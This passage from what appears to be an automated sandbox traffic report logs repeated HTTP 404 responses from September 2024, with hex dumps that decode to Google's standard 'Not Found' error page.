64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 